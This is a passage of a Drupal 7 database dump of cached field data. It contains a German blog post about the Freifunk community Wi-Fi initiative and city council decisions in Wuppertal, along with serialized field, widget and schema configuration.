                    \n\";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:1:{s:3:\"und\";a:2:{i:0;a:1:{s:3:\"tid\";s:1:\"1\";}i:1;a:1:{s:3:\"tid\";s:1:\"2\";}}}s:11:\"field_image\";a:0:{}}',0,1444940220,1),('field:node:7','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:3367:\"Ich bin schon seit Jahren ein Fan der Freifunk Idee.\r\nIch betreibe seit März 2015 den Freifunk Node im oberen Fischertal \"ff-ollital\".\r\nIn Zusammenarbeit mit Freifunk Wuppertal hat die Fraktion Bündnis 90 / Die Grünen\r\n einen Antrag in den Rat eingebracht, um das freie Internet in Wuppertal zu\r\nfördern.\r\nDas Gebäudemanagement hat dem Antrag vorbehaltlich der Kostenfrage am 16.04.2015\r\nzugestimmt.\r\nDer Stadtrat hat den Antrag am 11.02.2015 an den Stadtentwicklungsauschuss (Sitzung 11.06.) verwiesen, da die Verwaltung aber bis dahin das geforderte rechtliche Gutachten vorlegen konnte, haben wir den Antrag deshalb auf die Ausschusssitzung im August vertagt.\r\n\r\nDer Landtag NRW hat am 25.06.2015 beschlossen, die Dachflächen der landeseigenen Gebäuden dem Freifunk Rheinland e.V. zur Verfügung zu stellen.\r\n\r\nAm 19.08.2015 gab das GMW überraschend in einer Pressekonferenz bekannt, 850 Standorte für Router zur Verfügung zu stellen.\r\n\r\nIn der Ratssitzung vom 07.09.2015 wurde dies auch formell einstimmig beschlossen.\r\nHier sieht man die Auslastung der Router in Utopiastadt beim Trassenfest am 19.04.2015 sehr deutlich. 150 Clients waren zeitweise gleichzeitig verbunden.\r\n\r\nEs ist natürlich jedermensch freigestellt, einen eigenen Freifunk Node bei sich zu Hause zu betreiben.\r\nJe dichter die Vermaschung ist, desto wirksamer ist das ganze System.\r\n\r\nVielen Dank an Lukas Lamla, Babak Tubis und Ralf Glörfeld, die mit ihren Antworten und Erklärungen viel zu meinem Verständnis des Themas beigetragen haben.\r\n\r\nLinksammlung:\r\nBericht der Aktuellen Stunde zum Landtagsbeschluss\r\nFreifunk in Arnsberg realisiert (Arnsberg Info)\r\nStädte, die Freifunk aktiv unterstützen (Freifunk Forum)\r\nStromverbrauch (Freifunk Stuttgart)\r\nStromkosten (Freifunk Kiel)\r\nStrahlungsbelastung (Aktionsprogramm Umwelt und Gesundheit NRW)\r\nSprach- und Datenübertragung per Funk: Bluetooth und WLAN (Bundesamt für Strahlungsschutz)\r\nFreifunkantrag der Piratenfraktion im Landtag NRW\r\nFreifunk Rheinland e.V.\r\n350 neue WLAN-Standorte für Wien (ORF AT)\r\nSo bekommt Wuppertal WLAN (WZ-Newsline)\";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:3488:\"

                    Ich bin schon seit Jahren ein Fan der Freifunk Idee.
                    \nIch betreibe seit März 2015 den Freifunk Node im oberen Fischertal \"ff-ollital\".
                    \nIn Zusammenarbeit mit Freifunk Wuppertal hat die Fraktion Bündnis 90 / Die Grünen
                    \n einen Antrag in den Rat eingebracht, um das freie Internet in Wuppertal zu
                    \nfördern
                    .
                    \nDas Gebäudemanagement hat dem Antrag vorbehaltlich der Kostenfrage am 16.04.2015
                    \nzugestimmt.
                    \nDer Stadtrat hat den Antrag am 11.02.2015 an den Stadtentwicklungsauschuss (Sitzung 11.06.) verwiesen, da die Verwaltung aber bis dahin das geforderte rechtliche Gutachten vorlegen konnte, haben wir den Antrag deshalb auf die Ausschusssitzung im August vertagt.

                    \n

                    Der Landtag NRW hat am 25.06.2015 beschlossen, die Dachflächen der landeseigenen Gebäuden dem Freifunk Rheinland e.V. zur Verfügung zu stellen.

                    \n

                    Am 19.08.2015 gab das GMW überraschend in einer Pressekonferenz bekannt, 850 Standorte für Router zur Verfügung zu stellen.

                    \n

                    In der Ratssitzung vom 07.09.2015 wurde dies auch formell einstimmig beschlossen.
                    Hier sieht man die Auslastung der Router in Utopiastadt beim Trassenfest am 19.04.2015 sehr deutlich. 150 Clients waren zeitweise gleichzeitig verbunden.

                    \n

                    Es ist natürlich jedermensch freigestellt, einen eigenen Freifunk Node bei sich zu Hause zu betreiben.
                    \nJe dichter die Vermaschung ist, desto wirksamer ist das ganze System.

                    \n

                    Vielen Dank an Lukas Lamla, Babak Tubis und Ralf Glörfeld, die mit ihren Antworten und Erklärungen viel zu meinem Verständnis des Themas beigetragen haben.

                    \n

                    Linksammlung:
                    Bericht der Aktuellen Stunde zum Landtagsbeschluss
                    Freifunk in Arnsberg realisiert (Arnsberg Info)
                    Städte, die Freifunk aktiv unterstützen (Freifunk Forum)
                    Stromverbrauch (Freifunk Stuttgart)
                    Stromkosten (Freifunk Kiel)
                    Strahlungsbelastung (Aktionsprogramm Umwelt und Gesundheit NRW)
                    Sprach- und Datenübertragung per Funk: Bluetooth und WLAN (Bundesamt für Strahlungsschutz)
                    Freifunkantrag der Piratenfraktion im Landtag NRW
                    Freifunk Rheinland e.V.
                    350 neue WLAN-Standorte für Wien (ORF AT)
                    So bekommt Wuppertal WLAN (WZ-Newsline)

                    \n\";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:0:{}s:11:\"field_image\";a:0:{}}',0,1444940233,1),('field:taxonomy_term:1','a:0:{}',0,1444940220,1),('field:taxonomy_term:2','a:0:{}',0,1444940220,1),('field:taxonomy_term:3','a:0:{}',0,1444940212,1),('field:user:1','a:0:{}',0,1444977211,1),('field_info:bundle:comment:comment_node_article','a:2:{s:9:\"instances\";a:1:{s:12:\"comment_body\";a:13:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"3\";s:8:\"field_id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:11:\"entity_type\";s:7:\"comment\";s:6:\"bundle\";s:20:\"comment_node_article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}}s:6:\"fields\";a:1:{i:0;a:16:{s:12:\"entity_types\";a:1:{i:0;s:7:\"comment\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:23:\"field_data_comment_body\";a:2:{s:5:\"value\";s:18:\"comment_body_value\";s:6:\"format\";s:19:\"comment_body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:27:\"field_revision_comment_body\";a:2:{s:5:\"value\";s:18:\"comment_body_value\";s:6:\"format\";s:19:\"comment_body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:4:\"type\";s:9:\"text_long\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:2:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:7:\"comment\";a:3:{i:0;s:17:\"comment_node_page\";i:1;s:20:\"comment_node_article\";i:2;s:17:\"comment_node_blog\";}}}}}',0,1444940212,1),('field_info:bundle:node:article','a:2:{s:9:\"instances\";a:3:{s:4:\"body\";a:13:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"4\";s:8:\"field_id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}s:10:\"field_tags\";a:13:{s:5:\"label\";s:4:\"Tags\";s:11:\"description\";s:63:\"Enter a comma-separated list of words to describe your content.\";s:6:\"widget\";a:4:{s:4:\"type\";s:21:\"taxonomy_autocomplete\";s:6:\"weight\";i:-4;s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:6:\"module\";s:8:\"taxonomy\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:6:\"teaser\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}}s:8:\"settings\";a:1:{s:18:\"user_register_form\";b:0;}s:8:\"required\";b:0;s:2:\"id\";s:1:\"5\";s:8:\"field_id\";s:1:\"3\";s:10:\"field_name\";s:10:\"field_tags\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}s:11:\"field_image\";a:12:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:40:\"Upload an image to go with this article.\";s:8:\"required\";b:0;s:8:\"settings\";a:9:{s:14:\"file_directory\";s:11:\"field/image\";s:15:\"file_extensions\";s:16:\"png gif jpg jpeg\";s:12:\"max_filesize\";s:0:\"\";s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:9:\"alt_field\";b:1;s:11:\"title_field\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:6:\"widget\";a:4:{s:4:\"type\";s:11:\"image_image\";s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:5:\"large\";s:10:\"image_link\";s:0:\"\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:6:\"medium\";s:10:\"image_link\";s:7:\"content\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}}s:2:\"id\";s:1:\"6\";s:8:\"field_id\";s:1:\"4\";s:10:\"field_name\";s:11:\"field_image\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";}}s:6:\"fields\";a:3:{i:0;a:16:{s:12:\"entity_types\";a:1:{i:0;s:4:\"node\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:15:\"field_data_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:19:\"field_revision_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:4:\"type\";s:17:\"text_with_summary\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:3:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:7:\"summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:3:{i:0;s:4:\"page\";i:1;s:7:\"article\";i:2;s:4:\"blog\";}}}i:1;a:16:{s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:4:\"tags\";s:6:\"parent\";i:0;}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";s:1:\"0\";s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:21:\"field_data_field_tags\";a:1:{s:3:\"tid\";s:14:\"field_tags_tid\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:25:\"field_revision_field_tags\";a:1:{s:3:\"tid\";s:14:\"field_tags_tid\";}}}}}s:12:\"foreign keys\";a:1:{s:3:\"tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:7:\"indexes\";a:1:{s:3:\"tid\";a:1:{i:0;s:3:\"tid\";}}s:2:\"id\";s:1:\"3\";s:10:\"field_name\";s:10:\"field_tags\";s:4:\"type\";s:23:\"taxonomy_term_reference\";s:6:\"module\";s:8:\"taxonomy\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:2:\"-1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:1:{s:3:\"tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}}i:2;a:16:{s:7:\"indexes\";a:1:{s:3:\"fid\";a:1:{i:0;s:3:\"fid\";}}s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";b:0;}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:22:\"field_data_field_image\";a:5:{s:3:\"fid\";s:15:\"field_image_fid\";s:3:\"alt\";s:15:\"field_image_alt\";s:5:\"title\";s:17:\"field_image_title\";s:5:\"width\";s:17:\"field_image_width\";s:6:\"height\";s:18:\"field_image_height\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:26:\"field_revision_field_image\";a:5:{s:3:\"fid\";s:15:\"field_image_fid\";s:3:\"alt\";s:15:\"field_image_alt\";s:5:\"title\";s:17:\"field_image_title\";s:5:\"width\";s:17:\"field_image_width\";s:6:\"height\";s:18:\"field_image_height\";}}}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";s:1:\"0\";s:12:\"foreign keys\";a:1:{s:3:\"fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:3:\"fid\";s:3:\"fid\";}}}s:2:\"id\";s:1:\"4\";s:10:\"field_name\";s:11:\"field_image\";s:4:\"type\";s:5:\"image\";s:6:\"module\";s:5:\"image\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:5:{s:3:\"fid\";a:4:{s:11:\"description\";s:54:\"The {file_managed}.fid being referenced in this field.\";s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:3:\"alt\";a:4:{s:11:\"description\";s:56:\"Alternative image text, for the image\'s \'alt\' attribute.\";s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:5:\"title\";a:4:{s:11:\"description\";s:52:\"Image title text, for the image\'s \'title\' attribute.\";s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:5:\"width\";a:3:{s:11:\"description\";s:33:\"The width of the image in pixels.\";s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:6:\"height\";a:3:{s:11:\"description\";s:34:\"The height of the image in pixels.\";s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}}}}',0,1444940208,1),('field_info:bundle:taxonomy_term:tags','a:2:{s:9:\"instances\";a:0:{}s:6:\"fields\";a:0:{}}',0,1444940212,1),('field_info:bundle:user:user','a:2:{s:9:\"instances\";a:0:{}s:6:\"fields\";a:0:{}}',0,1444977211,1),('field_info:bundle_extra:comment:comment_node_article','a:1:{s:4:\"form\";a:2:{s:6:\"author\";a:3:{s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:16:\"Author textfield\";s:6:\"weight\";i:-2;}s:7:\"subject\";a:3:{s:5:\"label\";s:7:\"Subject\";s:11:\"description\";s:17:\"Subject textfield\";s:6:\"weight\";i:-1;}}}',0,1444940212,1),('field_info:bundle_extra:node:article','a:1:{s:4:\"form\";a:1:{s:5:\"title\";a:3:{s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:19:\"Node module element\";s:6:\"weight\";i:-5;}}}',0,1444940208,1),('field_info:bundle_extra:taxonomy_term:tags','a:2:{s:4:\"form\";a:2:{s:4:\"name\";a:3:{s:5:\"label\";s:4:\"Name\";s:11:\"description\";s:19:\"Term name textfield\";s:6:\"weight\";i:-5;}s:11:\"description\";a:3:{s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:25:\"Term description textarea\";s:6:\"weight\";i:0;}}s:7:\"display\";a:1:{s:11:\"description\";a:3:{s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:16:\"Term description\";s:7:\"display\";a:2:{s:7:\"default\";a:2:{s:6:\"weight\";i:0;s:7:\"visible\";b:1;}s:4:\"full\";a:2:{s:6:\"weight\";i:0;s:7:\"visible\";b:1;}}}}}',0,1444995772,1),('field_info:field_map','a:4:{s:12:\"comment_body\";a:2:{s:7:\"bundles\";a:1:{s:7:\"comment\";a:3:{i:0;s:17:\"comment_node_page\";i:1;s:20:\"comment_node_article\";i:2;s:17:\"comment_node_blog\";}}s:4:\"type\";s:9:\"text_long\";}s:4:\"body\";a:2:{s:7:\"bundles\";a:1:{s:4:\"node\";a:3:{i:0;s:4:\"page\";i:1;s:7:\"article\";i:2;s:4:\"blog\";}}s:4:\"type\";s:17:\"text_with_summary\";}s:10:\"field_tags\";a:2:{s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}s:4:\"type\";s:23:\"taxonomy_term_reference\";}s:11:\"field_image\";a:2:{s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}s:4:\"type\";s:5:\"image\";}}',0,1444940208,1),('field_info_types:en','a:4:{s:11:\"field types\";a:13:{s:4:\"file\";a:7:{s:5:\"label\";s:4:\"File\";s:11:\"description\";s:55:\"This field stores the ID of a file as an integer value.\";s:8:\"settings\";a:3:{s:13:\"display_field\";i:0;s:15:\"display_default\";i:0;s:10:\"uri_scheme\";s:6:\"public\";}s:17:\"instance_settings\";a:5:{s:15:\"file_extensions\";s:3:\"txt\";s:14:\"file_directory\";s:0:\"\";s:12:\"max_filesize\";s:0:\"\";s:17:\"description_field\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:12:\"file_generic\";s:17:\"default_formatter\";s:12:\"file_default\";s:6:\"module\";s:4:\"file\";}s:5:\"image\";a:7:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:62:\"This field stores the ID of an image file as an integer value.\";s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";i:0;}s:17:\"instance_settings\";a:9:{s:15:\"file_extensions\";s:16:\"png gif jpg jpeg\";s:14:\"file_directory\";s:0:\"\";s:12:\"max_filesize\";s:0:\"\";s:9:\"alt_field\";i:0;s:11:\"title_field\";i:0;s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:11:\"image_image\";s:17:\"default_formatter\";s:5:\"image\";s:6:\"module\";s:5:\"image\";}s:12:\"list_integer\";a:7:{s:5:\"label\";s:14:\"List (integer)\";s:11:\"description\";s:144:\"This field stores integer values from a list of allowed \'value => label\' pairs, i.e. \'Lifetime in days\': 1 => 1 day, 7 => 1 week, 31 => 1 month.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:10:\"list_float\";a:7:{s:5:\"label\";s:12:\"List (float)\";s:11:\"description\";s:134:\"This field stores float values from a list of allowed \'value => label\' pairs, i.e. \'Fraction\': 0 => 0, .25 => 1/4, .75 => 3/4, 1 => 1.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:9:\"list_text\";a:7:{s:5:\"label\";s:11:\"List (text)\";s:11:\"description\";s:137:\"This field stores text values from a list of allowed \'value => label\' pairs, i.e. \'US States\': IL => Illinois, IA => Iowa, IN => Indiana.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:12:\"list_boolean\";a:7:{s:5:\"label\";s:7:\"Boolean\";s:11:\"description\";s:50:\"This field stores simple on/off or yes/no options.\";s:8:\"settings\";a:2:{s:14:\"allowed_values\";a:0:{}s:23:\"allowed_values_function\";s:0:\"\";}s:14:\"default_widget\";s:15:\"options_buttons\";s:17:\"default_formatter\";s:12:\"list_default\";s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:4:\"list\";}s:14:\"number_integer\";a:7:{s:5:\"label\";s:7:\"Integer\";s:11:\"description\";s:57:\"This field stores a number in the database as an integer.\";s:17:\"instance_settings\";a:5:{s:3:\"min\";s:0:\"\";s:3:\"max\";s:0:\"\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:6:\"number\";s:17:\"default_formatter\";s:14:\"number_integer\";s:8:\"settings\";a:0:{}s:6:\"module\";s:6:\"number\";}s:14:\"number_decimal\";a:7:{s:5:\"label\";s:7:\"Decimal\";s:11:\"description\";s:69:\"This field stores a number in the database in a fixed decimal format.\";s:8:\"settings\";a:3:{s:9:\"precision\";i:10;s:5:\"scale\";i:2;s:17:\"decimal_separator\";s:1:\".\";}s:17:\"instance_settings\";a:5:{s:3:\"min\";s:0:\"\";s:3:\"max\";s:0:\"\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:6:\"number\";s:17:\"default_formatter\";s:14:\"number_decimal\";s:6:\"module\";s:6:\"number\";}s:12:\"number_float\";a:7:{s:5:\"label\";s:5:\"Float\";s:11:\"description\";s:70:\"This field stores a number in the database in a floating point format.\";s:8:\"settings\";a:1:{s:17:\"decimal_separator\";s:1:\".\";}s:17:\"instance_settings\";a:5:{s:3:\"min\";s:0:\"\";s:3:\"max\";s:0:\"\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:6:\"number\";s:17:\"default_formatter\";s:14:\"number_decimal\";s:6:\"module\";s:6:\"number\";}s:23:\"taxonomy_term_reference\";a:7:{s:5:\"label\";s:14:\"Term reference\";s:11:\"description\";s:49:\"This field stores a reference to a taxonomy term.\";s:14:\"default_widget\";s:14:\"options_select\";s:17:\"default_formatter\";s:28:\"taxonomy_term_reference_link\";s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:0:\"\";s:6:\"parent\";s:1:\"0\";}}}s:17:\"instance_settings\";a:1:{s:18:\"user_register_form\";b:0;}s:6:\"module\";s:8:\"taxonomy\";}s:4:\"text\";a:7:{s:5:\"label\";s:4:\"Text\";s:11:\"description\";s:47:\"This field stores varchar text in the database.\";s:8:\"settings\";a:1:{s:10:\"max_length\";i:255;}s:17:\"instance_settings\";a:2:{s:15:\"text_processing\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:14:\"text_textfield\";s:17:\"default_formatter\";s:12:\"text_default\";s:6:\"module\";s:4:\"text\";}s:9:\"text_long\";a:7:{s:5:\"label\";s:9:\"Long text\";s:11:\"description\";s:44:\"This field stores long text in the database.\";s:17:\"instance_settings\";a:2:{s:15:\"text_processing\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:13:\"text_textarea\";s:17:\"default_formatter\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}s:17:\"text_with_summary\";a:7:{s:5:\"label\";s:21:\"Long text and summary\";s:11:\"description\";s:77:\"This field stores long text in the database along with optional summary text.\";s:17:\"instance_settings\";a:3:{s:15:\"text_processing\";i:1;s:15:\"display_summary\";i:0;s:18:\"user_register_form\";b:0;}s:14:\"default_widget\";s:26:\"text_textarea_with_summary\";s:17:\"default_formatter\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:12:\"widget types\";a:10:{s:21:\"taxonomy_autocomplete\";a:5:{s:5:\"label\";s:34:\"Autocomplete term widget (tagging)\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:6:\"module\";s:8:\"taxonomy\";}s:14:\"text_textfield\";a:4:{s:5:\"label\";s:10:\"Text field\";s:11:\"field types\";a:1:{i:0;s:4:\"text\";}s:8:\"settings\";a:1:{s:4:\"size\";i:60;}s:6:\"module\";s:4:\"text\";}s:13:\"text_textarea\";a:4:{s:5:\"label\";s:25:\"Text area (multiple rows)\";s:11:\"field types\";a:1:{i:0;s:9:\"text_long\";}s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"module\";s:4:\"text\";}s:26:\"text_textarea_with_summary\";a:4:{s:5:\"label\";s:24:\"Text area with a summary\";s:11:\"field 